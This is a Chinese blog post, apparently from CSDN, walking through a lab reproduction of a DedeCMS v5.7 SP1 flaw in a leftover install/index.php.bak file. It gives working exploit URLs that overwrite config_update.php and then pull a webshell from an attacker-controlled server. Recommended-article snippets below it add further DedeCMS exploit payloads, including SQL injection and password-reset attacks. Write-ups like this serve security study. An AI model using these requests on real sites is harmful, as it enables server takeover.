dedecms-v5.7-sp1远程文件包含getshell

最新推荐文章于 2023-10-06 14:35:40 发布
最新推荐文章于 2023-10-06 14:35:40 发布
阅读量6.2k 收藏 4
点赞数
文章标签: dedecms 漏洞

前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~

利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak 。


      其次,目标站点的Apache存在文件解析漏洞。即index.php.bak文件会被当做PHP脚本解析。


问题代码如下:


else if($step==11)
{
	require_once('../data/admin/config_update.php');
	$rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";

	$sql_content = file_get_contents($rmurl);
	$fp = fopen($install_demo_name,'w');
	if(fwrite($fp,$sql_content))
		echo '  <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
	else
		echo '  <font color="red">[×]</font> 远程获取失败';
	unset($sql_content);
	fclose($fp);
	exit();
}

然而,$updateHost 变量是通过包含../data/admin/config_update.php这个文件获得的:



到此,不知各位看官是否意识到,我们可以利用index.php.bak文件 step 11中的代码,来在服务器上写入任意文件!

由于远程要包含文件的服务器地址是通过 $updateHost 控制的,那我们首先利用代码来改写../data/admin/config_update.php这个文件,使我们可以自定义 $updateHost的值,那样就可以引用任何我们想要引用的文件啦!

 

先提交这个请求url:

http://192.168.0.129/install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php

 

这会让代码直接跳到step 11开始执行,到dede的远程服务器http://updatenew.dedecms.com/base-v57/dedecms/demodata.x.txt中取内容,然后写入到config_update.php文件中去。

由于demodata.x.txt文件是不存在的,所以就会取到空内容写入 config_update.php这个文件中,自然$updateHost变量就可以由我们自定义了!

 

 

构造demodata.x.txt文件中的内容为我们需要的,比如一句话等,并放在远程服务器上(由于本地测试,所以还是放在本机上了):



然后再次提交请求:

http://192.168.0.129/install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://192.168.0.129:700/

即可得到shell,目录为 ../data/test.php

OK,大功告成!


What_Happened
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dedecms5.7最新漏洞修复
a1079540945的专栏
10-15 4164
文章来源:武汉八音猫科技有限公司
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2394
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
dedecms V5.7 SP2 web后台getshell
公众号shadow sock7
11-12 5197
https://www.freebuf.com/vuls/164035.html dede/tpl.php任意文件写入漏洞。 条件:已登录后台。 首先访问/dede/tpl.php?action=upload获取token值 访问/dede/tpl.php?filename=&amp;amp;amp;amp;amp;lt;yourname&amp;amp;amp;amp;amp;gt;.lib.php&amp;amp;amp;amp;amp;amp;action=savetagf
dedecms漏洞
https://www.cnblogs.com/zpchcbd/
05-10 2791
5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...
DeDeCMS v5.7{SP1,SP2} 密码修改漏洞(附PoC)
热门推荐
公众号shadow sock7
11-12 1万+
原文:https://paper.seebug.org/507/ 由于admin无法前台登录,所以需要先拿到admin的前台权限。 先拿到admin的前台权限 1.注册0000001用户名的账号 审核通过(或者设置为不需审核) 2. 访问/member/index.php?uid=0000001。 注意只有访问了/member/index.php?uid=0000001才会生成相应的所需的cook...
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
dedecms漏洞复现+分析
weixin_44897902的博客
01-05 1146
1.修改任意用户密码 首先注册两个用户,123,1234;在后台已知123的id为2,1234的id为3 登录1234,修改id为2的密码 payload: /DedeCMS-V5.7-UTF8-SP2/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2...
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
DEDECMS5.7后台getshell1
08-03
DEDECMS 5.7后台Getshell漏洞是近期爆出的一个漏洞,该漏洞允许攻击者在DEDECMS 5.7后台上传恶意文件,从而获取服务器的控制权。下面我们将对这个漏洞进行深入分析。 漏洞成因 该漏洞的成因是DEDECMS 5.7后台在上...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
11-19
此版本v5.7可能是该系统的某个稳定版本,包含了核心功能和必要的更新。 【描述】描述中的“php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip”强调了这个模板是专为品牌设计公司设计的,可能包含了一些独特的布局、...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
"v5.7"表示这是DEDECMS的一个特定版本,通常每个版本会包含一些功能改进、错误修复和安全性更新。 【标签】"PHP"表明这个项目是使用PHP语言开发的。PHP是一种广泛使用的服务器端脚本语言,尤其适合于Web开发,可以...
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7351
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
getshell姿势(三)--文件包含
最新发布
qq_45936617的博客
10-06 303
文件包含是指一个文件可以包含(接入)另一个文件。常见的PHP文件包含函数为include()、require()、include_once()、require_once()。文件包含可以分为本地文件包含远程文件包含。本地文件包含只能对服务器本地文件进行包含;远程文件包含可以通过URL地址包含其他服务器的内容。在PHP环境中,远程文件包含需要的条件为allow_url_include、allow_url_fopen为开启状态:on。
DedecmsV5.7任意代码执行漏洞复现(靶场及工具已打包)
爱国小白帽
12-29 2462
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有 准备 靶场及工具打包在公众号,回复“dede”领取,也可单独下载 dedecmsV5.7靶机源码 冰蝎3.0window版 可公网访问的云端服务器(如果没有可用本地虚拟机模拟) phpstudy D盾(次要) FinalShell(次要) 首先将靶机解压,进入install目录,将install_lock.txt文件删除,inde.
dedecmsv5.7sp1远程文件包含漏洞审计
安全大白
10-27 785
漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖以至于最后引起远程文件包含漏洞
Metinfo 5.3 后台getshell远程文件包含漏洞)分析
__Curtain_
08-30 6090
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 413
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
dedecms-v5.7-utf8-sp2
07-30
dedecms-v5.7-utf8-sp2是一个基于PHP开发的开源CMS系统。 dedecms具有良好的扩展性和易用性,适用于中小型网站的构建和管理。 v5.7-utf8-sp2是dedecms的一个特定版本,其中v5.7表示主要版本号,utf8表示该版本支持UTF-8编码,sp2表示此版本的第2次升级。 dedecms-v5.7-utf8-sp2拥有许多有用的功能,如内容管理、会员管理、模块扩展等。通过dedecms,用户可以方便地创建网站、发布和管理内容,包括文章、图片、音频、视频等。其中,内容管理模块提供了灵活的分类和标签系统,允许用户管理和展示各种类型的内容。会员管理模块则提供了会员注册、登录、权限设置等功能,方便用户管理网站的访问和权限控制。此外,dedecms还支持第三方模块和插件的集成,可以通过扩展模块来增强系统功能。 dedecms-v5.7-utf8-sp2还具有良好的性能和安全性。它采用了优化的代码结构和缓存机制,以提高页面加载速度和响应能力。同时,dedecms-v5.7-utf8-sp2还提供了一系列的用户权限和安全策略,如登录验证、密码加密等,以保护用户数据和网站安全。 总之,dedecms-v5.7-utf8-sp2是一个功能强大、易于使用和安全可靠的开源CMS系统,适用于中小型网站的建设和管理。它通过丰富的功能和灵活的扩展性,帮助用户快速构建和管理网站,并提供良好的用户体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值